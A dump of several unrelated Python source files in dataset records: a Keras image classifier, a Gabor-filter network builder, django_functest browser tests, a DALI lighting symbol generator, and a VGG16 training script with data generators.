modelpath, labels, min_confidence = 0.6):\n from keras.models import load_model\n from keras.applications.resnet50 import ResNet50\n self.resnet = ResNet50(include_top=False,weights='imagenet',pooling='max',input_shape=(224,224,3))\n self.extModel = load_model(modelpath)\n \n if(isinstance(labels,str)):\n #its a file path\n from os.path import exists\n if(exists(labels)):\n f = open(labels,'r')\n x = f.readlines()\n y = []\n for i in x:\n y.append(i.split('\\n')[0])\n self.labels = y\n else:\n self.labels = labels\n \n self.num_classes = len(labels)\n self.min_confidence=min_confidence\n \n \n def predict(self,img):\n import os\n from PIL import Image\n from keras.preprocessing.image import img_to_array\n import numpy as np \n #check if image is a filepath\n if(isinstance(img,str)):\n if(not os.path.exists(img)):\n print(\"Error: Invalid File Path\")\n return \"\"\n else:\n #if its a filepath, convert to PIL image\n img = Image.open(img)\n \n #resize image\n #shape from model input\n shape = self.resnet.input_shape\n imgr = img.resize(shape[1:3])\n \n x = img_to_array(imgr).reshape((1,shape[1],shape[2],shape[3]))\n \n \n #predict\n features = self.resnet.predict(x)\n prediction = self.extModel.predict(features)\n \n #get max of predictions and return label(s)\n predIdx = np.argmax(prediction)\n if(prediction[0,predIdx] 1:\n raise RuntimeError(\"uncoordinated gabor filters\")\n\n unique_gabor_widths = set(map(lambda x: x.shape.columns, self._gabor_filters))\n if len(unique_gabor_widths) > 1:\n raise RuntimeError(\"uncoordinated gabor filters\")\n\n gabor_width = list(unique_gabor_widths)[0]\n gabor_height = list(unique_gabor_heights)[0]\n if gabor_height > self._image_shape.rows or gabor_width > self._image_shape.columns:\n raise RuntimeError(\"too wide gabor filters\")\n\n if self._image_shape.rows < self._gabor_pooling_kernel_shape.rows:\n raise RuntimeError(\"gabor_pooling_layer_kernel_shape height is too long\")\n\n if self._image_shape.rows % self._gabor_pooling_kernel_shape.rows != 0:\n raise RuntimeError(\"image_shape height is not divisible by gabor_pooling_layer_kernel_shape height\")\n\n if self._image_shape.columns < self._gabor_pooling_kernel_shape.columns:\n raise RuntimeError(\"gabor_pooling_layer_kernel_shape width is too long\")\n\n if self._image_shape.columns % self._gabor_pooling_kernel_shape.columns != 0:\n raise RuntimeError(\"image_shape width is not divisible by gabor_pooling_layer_kernel_shape width\")\n\n if self._complex_layer_kernel_shape.rows % 2 == 0 or self._complex_layer_kernel_shape.columns % 2 == 0:\n raise RuntimeError(\"complex_layer_kernel_shape width and height must be odd\")\n\n gabor_pooling_layer_maps_height = self._image_shape.rows / self._gabor_pooling_kernel_shape.rows\n if self._complex_layer_kernel_shape.rows > gabor_pooling_layer_maps_height:\n raise RuntimeError(\"complex_layer_kernel_shape height is too long\")\n\n gabor_pooling_layer_maps_width = self._image_shape.columns / self._gabor_pooling_kernel_shape.columns\n if self._complex_layer_kernel_shape.columns > gabor_pooling_layer_maps_width:\n raise RuntimeError(\"complex_layer_kernel_shape width is too long\")\n\n def _check_types(self):\n if type(self._image_shape) is not Shape:\n raise RuntimeError(\"image_shape must be an instance of Shape\")\n\n if type(self._gabor_filters) is not list:\n raise RuntimeError(\"gabor_filters must be a list\")\n\n for gabor_parameters in self._gabor_filters:\n if type(gabor_parameters) is not GaborParameters:\n raise RuntimeError(\"gabor_filters must be a list of GaborParameters\")\n\n if type(gabor_parameters.shape) is not Shape:\n raise RuntimeError(\"GaborParameters.shape must be an instance of Shape\")\n\n if type(self._gabor_pooling_kernel_shape) is not Shape:\n raise RuntimeError(\"gabor_pooling_layer_kernel_shape must be an instance of Shape\")\n\n if type(self._complex_layer_kernel_shape) is not Shape:\n raise RuntimeError(\"complex_layer_kernel_shape must be an instance of Shape\")\n\n def _get_gabor_pooling_layer_maps_shape(self):\n return Shape(\n rows=int(self._image_shape.rows / self._gabor_pooling_kernel_shape.rows),\n columns=int(self._image_shape.columns / self._gabor_pooling_kernel_shape.columns)\n )\n","sub_path":"myneuralnetwork/mnn_builder.py","file_name":"mnn_builder.py","file_ext":"py","file_size_in_byte":7040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"35485818","text":"from __future__ import absolute_import, print_function, unicode_literals\n\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\n\nfrom django_functest import FuncBaseMixin, Upload\nfrom django_functest.exceptions import (\n SeleniumCantUseElement, WebTestCantUseElement, WebTestMultipleElementsException, WebTestNoSuchElementException\n)\nfrom django_functest.tests.models import Thing\n\nfrom .base import ChromeBase, FirefoxBase, PhantomJSBase, WebTestBase\n\ntry:\n from django.urls import reverse\nexcept ImportError:\n from django.core.urlresolvers import reverse\n\n\nclass TestCommonBase(FuncBaseMixin):\n def setUp(self):\n super(TestCommonBase, self).setUp()\n self.thing = Thing.objects.create(name=\"Rock\",\n big=True,\n clever=False,\n element_type=Thing.ELEMENT_EARTH,\n category=Thing.CATEGORY_MAGMA,\n count=1,\n description=\"Hard thing\")\n\n def test_get_url(self):\n self.get_url('admin:login')\n url = self.current_url\n self.assertTrue(url.endswith(\"/admin/login/\"))\n self.assertTrue(url.startswith(\"http://\"))\n\n def test_get_literal_url(self):\n url = reverse('admin:login')\n self.get_literal_url(url)\n self.assertUrlsEqual(url)\n\n def test_get_literal_url_with_full_url(self):\n url = reverse('admin:login')\n self.get_literal_url(url)\n # Specifically check this idiom for refreshing a page:\n self.get_literal_url(self.current_url)\n self.assertUrlsEqual(url)\n\n def test_assertUrlsEqual_default(self):\n self.get_url('admin:login')\n self.assertRaises(AssertionError, lambda: self.assertUrlsEqual(\"foo\"))\n self.assertUrlsEqual(\"/admin/login/\")\n\n def test_assertUrlsEqual_path(self):\n self.assertRaises(AssertionError, lambda: self.assertUrlsEqual(\"/login/\", \"/admin/login/\"))\n self.assertUrlsEqual(\"/login/\", \"/login/\")\n\n def test_assertUrlsEqual_query(self):\n self.assertRaises(AssertionError, lambda: self.assertUrlsEqual(\"/foo/?q=1\", \"/foo/\"))\n self.assertRaises(AssertionError, lambda: self.assertUrlsEqual(\"/foo/?q=1\", \"/foo/?q=2\"))\n self.assertUrlsEqual(\"/foo/?q=1\", \"/foo/?q=1\")\n\n def test_assertUrlsEqual_host(self):\n self.assertUrlsEqual(\"/foo/\", \"//example.com/foo/\")\n self.assertUrlsEqual(\"//example.com/foo/\", \"//example.com/foo/\")\n self.assertRaises(AssertionError, lambda: self.assertUrlsEqual(\"//example.com/foo/\",\n \"//other.com/foo/\"))\n\n def test_assertUrlsEqual_protocol(self):\n self.assertUrlsEqual(\"http://example.com/foo/\", \"//example.com/foo/\")\n self.assertUrlsEqual(\"http://example.com/foo/\", \"http://example.com/foo/\")\n self.assertRaises(AssertionError, lambda: self.assertUrlsEqual(\"http://example.com/foo/\",\n \"https://example.com/foo/\"))\n\n def test_assertTextPresent(self):\n self.get_url('django_functest.test_misc')\n self.assertTextPresent(\"Hello world\")\n # Check escaping\n self.assertTextPresent(\"from 'me' & \\\"friends\\\"\")\n self.assertTextPresent(\"\"\"It's also allowed to have \"quotes\" without escaping in text in valid HTML\"\"\")\n\n self.assertRaises(AssertionError, lambda: self.assertTextPresent(\"Something definitely not there\"))\n\n def test_assertTextAbsent(self):\n self.get_url('django_functest.test_misc')\n self.assertTextAbsent(\"Something definitely not there\")\n self.assertRaises(AssertionError, lambda: self.assertTextAbsent(\"Hello world\"))\n self.assertRaises(AssertionError, lambda: self.assertTextAbsent(\"from 'me' & \\\"friends\\\"\"))\n self.assertRaises(AssertionError, lambda: self.assertTextAbsent(\"\"\"It's also allowed to have \"quotes\" \"\"\"\n \"\"\"without escaping in text in valid HTML\"\"\"))\n\n def test_current_url(self):\n self.get_url('admin:login')\n # Check it really is a full URL\n self.assertTrue(self.current_url.startswith('http'))\n\n def test_is_element_present(self):\n self.get_url('admin:login')\n self.assertTrue(self.is_element_present('#id_username'))\n self.assertFalse(self.is_element_present('#id_something_not_there'))\n\n def refresh_thing(self):\n self.thing = Thing.objects.get(id=self.thing.id)\n return self.thing\n\n def test_fill(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.fill({'#id_name': \"New name\",\n '#id_big': False,\n '#id_clever': True,\n '#id_element_type': Thing.ELEMENT_AIR,\n '#id_category_1': Thing.CATEGORY_QUASIGROUP,\n '#id_count': 5,\n '#id_description': \"Soft thing\\r\\nwith line breaks\",\n })\n self.submit('input[name=change]')\n self._assertThingChanged()\n\n def test_fill_by_id(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.fill_by_id({'id_name': \"New name\",\n 'id_big': False,\n 'id_clever': True,\n 'id_element_type': Thing.ELEMENT_AIR,\n 'id_category_1': Thing.CATEGORY_QUASIGROUP,\n 'id_count': 5,\n 'id_description': \"Soft thing\\r\\nwith line breaks\",\n })\n self.submit('input[name=change]')\n self._assertThingChanged()\n\n def test_fill_by_name(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.fill_by_name({'name': \"New name\",\n 'big': False,\n 'clever': True,\n 'element_type': Thing.ELEMENT_AIR,\n 'category': Thing.CATEGORY_QUASIGROUP,\n 'count': 5,\n 'description': \"Soft thing\\r\\nwith line breaks\",\n })\n self.submit('input[name=change]')\n self._assertThingChanged()\n\n def test_fill_by_text(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.fill_by_text({'#id_element_type': 'Water'})\n self.submit('input[name=change]')\n self.refresh_thing()\n self.assertEqual(self.thing.element_type,\n Thing.ELEMENT_WATER)\n\n def test_fill_by_text_missing(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.assertRaises(self.TextNotFoundException, lambda: self.fill_by_text({'#id_element_type': 'Plasma'}))\n\n def test_fill_by_text_for_unsupported(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.assertRaises(self.ElementUnusableException, lambda: self.fill_by_text({'#id_count': 'Water'}))\n\n def _assertThingChanged(self):\n thing = self.refresh_thing()\n self.assertEqual(thing.name, \"New name\")\n self.assertEqual(thing.big, False)\n self.assertEqual(thing.clever, True)\n self.assertEqual(thing.element_type, Thing.ELEMENT_AIR)\n self.assertEqual(thing.category, Thing.CATEGORY_QUASIGROUP)\n self.assertEqual(thing.count, 5)\n self.assertEqual(thing.description, \"Soft thing\\r\\nwith line breaks\")\n\n def test_fill_no_element_error(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.assertRaises(self.ElementNotFoundException, lambda: self.fill({'#id_blahblah': \"New name\"}))\n\n def test_fill_select_by_integer(self):\n url = reverse('edit_thing', kwargs=dict(thing_id=self.thing.id)) + \"?select_for_category=1\"\n self.get_literal_url(url)\n self.fill_by_name({'name': \"New name\",\n 'big': False,\n 'clever': True,\n 'element_type': Thing.ELEMENT_AIR,\n 'category': Thing.CATEGORY_QUASIGROUP,\n 'count': 5,\n 'description': \"Soft thing\\r\\nwith line breaks\",\n })\n self.submit('input[name=change]')\n self._assertThingChanged()\n\n def test_submit(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.submit('button[name=clear]')\n thing = self.refresh_thing()\n self.assertEqual(thing.name, \"\")\n\n def test_follow_link(self):\n self.get_url('list_things')\n self.follow_link('a.edit')\n self.assertUrlsEqual(reverse('edit_thing', kwargs={'thing_id': self.thing.id}))\n\n def test_follow_link_not_found(self):\n self.get_url('list_things')\n self.assertRaises(self.ElementNotFoundException, lambda: self.follow_link('a.foobar'))\n\n def test_back(self):\n self.get_url('list_things')\n self.follow_link('a.edit')\n self.back()\n self.assertUrlsEqual(reverse('list_things'))\n\n def test_multiple_back(self):\n # We could test the behaviour regarding forms, especially those that\n # submit to the same URL and then redirect to the same URL. However,\n # Firefox and Chrome behave differently here - Firefox produces\n # fewer history entries.\n self.get_url('list_things')\n self.follow_link('a.edit')\n edit_url = reverse('edit_thing', kwargs={'thing_id': self.thing.id})\n self.assertUrlsEqual(edit_url)\n self.submit('button[name=clear]')\n self.assertUrlsEqual(reverse('thing_cleared', kwargs={'thing_id': self.thing.id}))\n self.assertTextPresent(\"was cleared\")\n self.back()\n self.assertUrlsEqual(edit_url)\n self.back()\n self.assertUrlsEqual(reverse('list_things'))\n\n def test_set_session_data(self):\n self.set_session_data({'name': 'The Jabberwocky'})\n self.get_url('django_functest.test_misc')\n self.assertTextPresent(\"Hello to The Jabberwocky\")\n\n def test_get_session_data(self):\n self.get_url('django_functest.set_sess_foo_to_bar')\n sess_dict = self.get_session_data()\n self.assertEqual(sess_dict, {'foo': 'bar'})\n\n def test_value(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.assertEqual(self.value('#id_name'),\n \"Rock\")\n self.assertEqual(self.value('#id_big'),\n True)\n self.assertEqual(self.value('#id_clever'),\n False)\n self.assertEqual(self.value('#id_element_type'),\n 'e')\n self.assertEqual(self.value('[name=category]'),\n str(Thing.CATEGORY_MAGMA))\n self.assertEqual(self.value('#id_description'),\n 'Hard thing')\n\n def test_value_immediately_after_fill(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.fill_by_name({\n 'name': \"Some changed name\",\n 'big': False,\n 'clever': True,\n 'element_type': 'w',\n 'category': Thing.CATEGORY_MONOID,\n 'description': \"Some changed description\",\n })\n self.assertEqual(self.value('#id_name'),\n \"Some changed name\")\n self.assertEqual(self.value('#id_big'),\n False)\n self.assertEqual(self.value('#id_clever'),\n True)\n self.assertEqual(self.value('#id_element_type'),\n 'w')\n self.assertEqual(self.value('#id_description'),\n \"Some changed description\")\n self.assertEqual(self.value('[name=category]'),\n str(Thing.CATEGORY_MONOID))\n\n def test_file_upload(self):\n self.get_url('edit_thing_with_upload', thing_id=self.thing.id)\n data = b\"This is my data\"\n self.fill({'#id_notes_file': Upload(\"notes.txt\", content=data)})\n self.submit('[name=change]')\n thing = self.refresh_thing()\n self.assertEqual(thing.notes_file.file.read(), data)\n\n def test_new_browser_session(self):\n self.get_url('new_browser_session_test')\n self.assertTextPresent('Hello new user')\n self.assertTextAbsent('Welcome back')\n uid_1 = self.get_session_data()['UID']\n\n # Sanity check our view behaves as expected\n self.get_url('new_browser_session_test')\n self.assertTextPresent('Welcome back')\n uid_1b = self.get_session_data()['UID']\n\n self.assertEqual(uid_1, uid_1b)\n\n first_session_token, second_session_token = self.new_browser_session()\n self.get_url('new_browser_session_test')\n self.assertTextPresent('Hello new user')\n self.assertTextAbsent('Welcome back')\n uid_2 = self.get_session_data()['UID']\n self.assertNotEqual(uid_1, uid_2)\n\n # Tests for switch_browser_session\n ot2, nt2 = self.switch_browser_session(first_session_token)\n self.assertEqual(nt2, first_session_token)\n self.assertEqual(ot2, second_session_token)\n\n self.get_url('new_browser_session_test')\n self.assertTextPresent('Welcome back')\n self.assertTextPresent(uid_1)\n self.assertEqual(self.get_session_data()['UID'], uid_1)\n\n self.switch_browser_session(second_session_token)\n self.get_url('new_browser_session_test')\n self.assertTextPresent('Welcome back')\n self.assertTextPresent(uid_2)\n self.assertEqual(self.get_session_data()['UID'], uid_2)\n\n # assertTextPresent (etc.) should work without refetching\n # a page. This requires things like `last_response`\n # automatically switching.\n\n self.switch_browser_session(first_session_token)\n self.assertTextPresent(uid_1)\n self.assertTextAbsent(uid_2)\n self.switch_browser_session(second_session_token)\n self.assertTextPresent(uid_2)\n self.assertTextAbsent(uid_1)\n\n\nclass TestFuncWebTestCommon(TestCommonBase, WebTestBase):\n\n ElementNotFoundException = WebTestNoSuchElementException\n TextNotFoundException = ValueError\n ElementUnusableException = WebTestCantUseElement\n\n def test_is_full_browser_attribute(self):\n self.assertEqual(self.is_full_browser_test, False)\n\n def test_fill_multiple_matches(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.assertRaises(WebTestMultipleElementsException, lambda: self.fill({'input[type=checkbox]': True}))\n\n def test_fill_element_without_name(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.assertRaises(WebTestCantUseElement, lambda: self.fill({'#id_badinput1': \"Hello\"}))\n\n def test_fill_element_outside_form(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.assertRaises(WebTestCantUseElement, lambda: self.fill({'#id_badinput2': \"Hello\"}))\n\n def test_submit_no_auto_follow(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.submit('input[name=change]', auto_follow=False)\n self.assertEqual(self.last_response.status_int, 302)\n\n def test_follow_link_multiple_matches(self):\n Thing.objects.create(name=\"Another\")\n self.get_url('list_things')\n self.assertRaises(WebTestMultipleElementsException, lambda: self.follow_link('a.edit'))\n\n def test_follow_link_no_href(self):\n self.get_url('list_things')\n self.assertRaises(WebTestCantUseElement, lambda: self.follow_link('a.javascriptonly'))\n\n def test_get_literal_url_auto_follow(self):\n url = '/admin/login' # No trailing '/'\n self.get_literal_url(url, auto_follow=True)\n self.assertUrlsEqual(url + '/')\n\n self.get_literal_url(url, auto_follow=False)\n self.assertUrlsEqual(url)\n self.assertEqual(self.last_response.status_int, 301)\n\n def test_get_literal_url_expect_errors(self):\n url = '/a_404_url/'\n self.get_literal_url(url, expect_errors=True)\n self.assertEqual(self.last_response.status_int, 404)\n self.assertRaises(Exception, lambda: self.get_literal_url(url, expect_errors=False))\n\n\nclass TestFuncSeleniumCommonBase(TestCommonBase):\n\n ElementNotFoundException = TimeoutException\n TextNotFoundException = NoSuchElementException\n ElementUnusableException = SeleniumCantUseElement\n\n def test_is_full_browser_attribute(self):\n self.assertEqual(self.is_full_browser_test, True)\n\n def test_fill_with_scrolling(self):\n url = reverse('edit_thing', kwargs=dict(thing_id=self.thing.id)) + \"?add_spacers=1\"\n self.get_literal_url(url)\n self.fill({'#id_name': \"New name\",\n '#id_big': False,\n '#id_clever': True,\n '#id_element_type': Thing.ELEMENT_AIR,\n '#id_category_1': Thing.CATEGORY_QUASIGROUP,\n '#id_count': 5,\n '#id_description': \"Soft thing\\r\\nwith line breaks\",\n })\n self.submit('input[name=change]')\n self._assertThingChanged()\n\n def test_submit_no_wait_for_reload(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.submit('button[name=check]', wait_for_reload=False)\n self.assertTextPresent(\"Everything is fine\")\n\n def test_submit_slow_page(self):\n url = reverse('edit_thing', kwargs=dict(thing_id=self.thing.id)) + \"?add_js_delay=5\"\n self.get_literal_url(url)\n self.fill({'#id_name': \"New name\",\n '#id_big': False,\n '#id_clever': True,\n '#id_category_1': Thing.CATEGORY_QUASIGROUP,\n '#id_element_type': Thing.ELEMENT_AIR,\n '#id_count': 5,\n '#id_description': \"Soft thing\\r\\nwith line breaks\",\n })\n self.submit('input[name=change]')\n self._assertThingChanged()\n\n\nclass TestFuncSeleniumCommonFirefox(TestFuncSeleniumCommonBase, FirefoxBase):\n pass\n\n\nclass TestFuncSeleniumCommonChrome(TestFuncSeleniumCommonBase, ChromeBase):\n pass\n\n\nclass TestFuncSeleniumCommonPhantomJS(TestFuncSeleniumCommonBase, PhantomJSBase):\n pass\n","sub_path":"django_functest/tests/test_common.py","file_name":"test_common.py","file_ext":"py","file_size_in_byte":18403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"443017073","text":"#!/usr/bin/env python\n\"\"\"\nAjoute automatiquement un nombre de symboles de luminaire par zone d'un automate.\nUsage:\n python gen_dali.py\n\n\"\"\"\nimport os\nfrom collections import defaultdict\n\ndef read_dali_file(filename):\n # Build a dictionary with for each DALI module a list of LUL and DALI address read from a file.\n d = defaultdict(list)\n try:\n with open(filename, 'r') as f:\n for line in f:\n l = line.rstrip()\n if l.startswith('#'):\n continue\n\n if \"DALI\" in l:\n key = l\n else:\n s = l.split();\n if len(s) > 1:\n if len(s) == 4:\n d[key].append((s[1], (s[0], s[2], s[3])))\n elif len(s) == 3:\n d[key].append((s[1], (s[0], s[2])))\n else:\n d[key].append((s[1], s[0]))\n else:\n if len(s)>=1:\n print(\"WARN: Pas utilisé \"+l)\n\n except OSError as err:\n print('ERREUR: ouverture du fichier {}_DALI.txt'.format(filename))\n\n return d\n\ndef get_dali_bus(d, bus):\n l = d['DALI{}'.format(bus)]; # The list for the DALI module\n\n # check if an address already set, just print a message.\n x = 0\n for i in l:\n if x & (1 << int(i[0])):\n print('Adresse {} déjà utilisée'.format(i[0]))\n else:\n x |= (1 << int(i[0]))\n\n return dict(l)\n\n\n\"\"\"\nluls: dictionaire dont la clé est l'adresse DALI d'un luminaire et la valeur un tuple composé du nom du luminaire et en option du groupe dans lequel le luminaire est placé.\ntop: position haute du premier symbole\nleft: position gauche du premier symbole\n\"\"\"\ndef add_symbols(fw, luls, top, left):\n height = 13\n width = 34\n\n for lul in luls.values():\n if type(lul) is not tuple:\n # skip name without a DALI address affected.\n continue\n\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write('\\n')\n\n top = top + height + 10\n if top > 700:\n top = 10\n left = left + width + 10\n\n return top, left\n\n\n\"\"\"\nbasename The base of the input/output filenames.\nbus is the DALI bus number\n\"\"\"\ndef generate_tgml(basename, bus):\n # Read the DALI file and copy data in a dictionnary.\n d = read_dali_file('{}_DALI.txt'.format(basename))\n if len(d) == 0:\n print('No valid data found in file {}_DALI.txt'.format(basename))\n exit(0)\n\n # Get a dictionnary for the given bus.\n b = get_dali_bus(d, bus)\n if len(b) == 0:\n print('No data for bus {} found in file {}_DALI.txt'.format(bus, basename))\n exit(0)\n\n # Create the destination file.\n try:\n fw = open('{}_BUS{}.tgml'.format(basename, bus), \"w\")\n except IOError as e:\n print(\"I/O error({0}): {1}\".format(e.errno, e.strerror))\n exit()\n except: #handle other exceptions such as attribute errors\n print(\"Unexpected error:\", sys.exc_info()[0])\n exit()\n\n # Write data to file.\n fw.write('\\n')\n fw.write('\\n')\n fw.write(' \\n')\n\n add_symbols(fw, b, 10, 10)\n\n fw.write(' \\n')\n fw.write('\\n')\n fw.close()\n\n\"\"\"\n\"\"\"\ndef main():\n\n # S1\n #generate_tgml('+002_S1_S02.30_111=TDS32_01', 1)\n\n # 00\n #generate_tgml('+002_00_G05.30_002=TDS32_01', 1)\n #generate_tgml('+002_00_G05.30_002=TDS32_01', 2)\n #generate_tgml('+002_00_G05.30_002=TDS32_01', 3)\n #generate_tgml('+002_00_G05.30_002=TDS32_01', 4)\n\n #generate_tgml('+002_00_023.30_114=TDS32_01', 1)\n #generate_tgml('+002_00_023.30_114=TDS32_01', 2)\n #generate_tgml('+002_00_023.30_114=TDS32_01', 3)\n #generate_tgml('+002_00_023.30_114=TDS32_01', 4)\n #generate_tgml('+002_00_023.30_114=TDS32_01', 5)\n #generate_tgml('+002_00_023.30_114=TDS32_01', 7)\n #generate_tgml('+002_00_023.30_114=TDS32_01', 8)\n\n #generate_tgml('+002_00_004.30_001=TDS32_01', 1)\n #generate_tgml('+002_00_004.30_001=TDS32_01', 2)\n #generate_tgml('+002_00_004.30_001=TDS32_01', 3)\n\n generate_tgml('+002_00_014.30_003=TDS32_01', 1)\n generate_tgml('+002_00_014.30_003=TDS32_01', 2)\n generate_tgml('+002_00_014.30_003=TDS32_01', 3)\n\n # 01\n #generate_tgml('+002_01_021.30_004=TDS32_01', 1)\n #generate_tgml('+002_01_021.30_004=TDS32_01', 2)\n #generate_tgml('+002_01_021.30_004=TDS32_01', 3)\n #generate_tgml('+002_01_021.30_004=TDS32_01', 4)\n #generate_tgml('+002_01_021.30_004=TDS32_01', 5)\n #generate_tgml('+002_01_021.30_004=TDS32_01', 6)\n #generate_tgml('+002_01_021.30_004=TDS32_01', 7)\n #generate_tgml('+002_01_021.30_004=TDS32_01', 8)\n\n #generate_tgml('+002_01_G15.30_013=TDS32_01', 1)\n #generate_tgml('+002_01_G15.30_013=TDS32_01', 2)\n\n #generate_tgml('+002_01_G22.30_012=TDS32_01', 1)\n\n # 02\n #generate_tgml('+002_02_021.30_004=TDS32_01', 6)\n #generate_tgml('+002_02_021.30_004=TDS32_01', 7)\n\n #generate_tgml('+002_02_G21.30_001=TDS32_01', 2)\n #generate_tgml('+002_02_G21.30_001=TDS32_01', 3)\n #generate_tgml('+002_02_G21.30_001=TDS32_01', 4)\n #generate_tgml('+002_02_G21.30_001=TDS32_01', 5)\n\n #generate_tgml('+002_02_G15.30_023=TDS32_01', 1)\n #generate_tgml('+002_02_G15.30_023=TDS32_01', 2)\n #generate_tgml('+002_02_G15.30_023=TDS32_01', 3)\n\n #generate_tgml('+002_02_G22.30_022=TDS32_01', 1)\n #generate_tgml('+002_02_G22.30_022=TDS32_01', 2)\n\n # 03\n #generate_tgml('+002_03_040.30_030=TDS32_01', 7)\n #generate_tgml('+002_03_040.30_030=TDS32_01', 8)\n\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"cicg2/gen_dali.py","file_name":"gen_dali.py","file_ext":"py","file_size_in_byte":11523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"362139688","text":"import os, h5py\nimport scipy.io as mat_load\nimport numpy as np\nnp.random.seed(1337) # for reproducibility\n\nimport numpy.random as rng\nfrom keras.models import Sequential, Model, model_from_json, load_model\nfrom keras.layers import Dense, Dropout, Input, Lambda\nfrom keras import optimizers\nfrom keras import backend as K\nfrom keras.layers import Conv2D, MaxPooling2D,concatenate\nfrom keras.layers import Activation, Dropout, Flatten, Dense,Input\nfrom keras.utils.data_utils import get_file\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import load_model\nfrom keras.preprocessing import image\nfrom keras.applications.vgg16 import preprocess_input\nfrom keras.applications import vgg16, vgg19,inception_v3\nfrom keras.utils.np_utils import to_categorical\nfrom keras.callbacks import ModelCheckpoint\n\n# TODO: check on the size of input images MOON paper\nimg_width, img_height, depth = 224,224,3\nimg_input = Input(shape=(img_height,img_width,depth))\nnb_train_samples = 297803\n#nb_train_samples = 1000\nnb_validation_samples = 4500\n#nb_validation_samples = 1200\nnb_epoch = 50\nbatch_size = 64\n\n#Step 1: Train generator\ndef train_generator():\n #full_image_dir = 'keras_data/full_image/train'\n img_dir = '../data_affect/train_aug'\n label_file = mat_load.loadmat('da_train_aug_labels_5000')\n label_data = label_file['train_aug_labels']\n #landmark_data = label_file['landmark_labels']\n train_batch_size = batch_size\n image_id = 1\n train_index_thr = batch_size * int(nb_train_samples/batch_size)\n\n while True:\n batch_labels = []\n batch_landmark_labels = []\n batch_feature = []\n image_count = 0\n\n if((image_id+batch_size) > train_index_thr):\n image_id = 1\n\n\n while(image_count < batch_size and image_id < nb_train_samples):\n try:\n if image_id <= 42553:\n str_format = '.jpg'\n else:\n str_format = '.jpeg'\n\n filename = img_dir + '/image' + str(image_id).zfill(7) + str_format\n body_img = image.load_img(filename, target_size=(img_height,img_width))\n x = image.img_to_array(body_img)\n x = np.expand_dims(x, axis=0)\n feature01 = preprocess_input(x)\n img_label = label_data[image_id-1][0]\n\n landmark_label = label_data[image_id-1][1:]\n batch_feature += [feature01]\n batch_labels += [img_label]\n batch_landmark_labels += [landmark_label]\n image_count = image_count + 1\n image_id = image_id + 1\n except IOError:\n image_id = image_id + 1\n continue\n\n batch_labels = to_categorical(batch_labels,9)\n batch_labels = np.array(batch_labels)\n batch_landmark_labels = np.array(batch_landmark_labels)\n batch_feature = np.array(batch_feature)\n batch_feature = np.squeeze(batch_feature)\n\n yield (batch_feature,[batch_labels,batch_landmark_labels])\n\n\ndef val_generator():\n #full_image_dir = 'keras_data/full_image/train'\n img_dir = '../data_affect/val'\n label_file = mat_load.loadmat('landmark_val_labels')\n label_data = label_file['val_label']\n #landmark_data = label_file['landmark_labels']\n train_batch_size = batch_size\n image_id = 1\n train_index_thr = batch_size * int(nb_validation_samples/batch_size)\n\n while True:\n batch_labels = []\n batch_landmark_labels = []\n batch_feature = []\n image_count = 0\n\n if((image_id+batch_size) > train_index_thr):\n image_id = 1\n\n while(image_count < batch_size and image_id < nb_validation_samples):\n try:\n filename = img_dir + '/image' + str(image_id).zfill(7) + '.jpg'\n body_img = image.load_img(filename, target_size=(img_height,img_width))\n x = image.img_to_array(body_img)\n x = np.expand_dims(x, axis=0)\n feature01 = preprocess_input(x)\n\n img_label = label_data[image_id-1][0]\n landmark_label = label_data[image_id-1][1:]\n batch_feature += [feature01]\n batch_labels += [img_label]\n batch_landmark_labels += [landmark_label]\n image_count = image_count + 1\n image_id = image_id + 1\n except IOError:\n image_id = image_id + 1\n\n continue\n\n batch_labels = to_categorical(batch_labels,9)\n batch_labels = np.array(batch_labels)\n batch_landmark_labels = np.array(batch_landmark_labels)\n batch_feature = np.array(batch_feature)\n batch_feature = np.squeeze(batch_feature)\n\n yield (batch_feature,[batch_labels,batch_landmark_labels])\n\n\n# Set-up the architecture\nWEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5'\n#weights_path = 'keras_weights/vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5'\n\n# Block 1\nx = Conv2D(64, (3, 3), data_format='channels_last',padding = 'same', activation= 'relu',name='block1_conv1')(img_input)\nx = Conv2D(64, (3, 3), activation= 'relu', padding='same', name='block1_conv2')(x)\nx = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x)\n\n# Block 2\nx = Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv1')(x)\nx = Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv2')(x)\nx = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x)\n\n# Block 3\nx = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv1')(x)\nx = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv2')(x)\nx = Conv2D(256, (3, 3), activation='relu', padding='same', 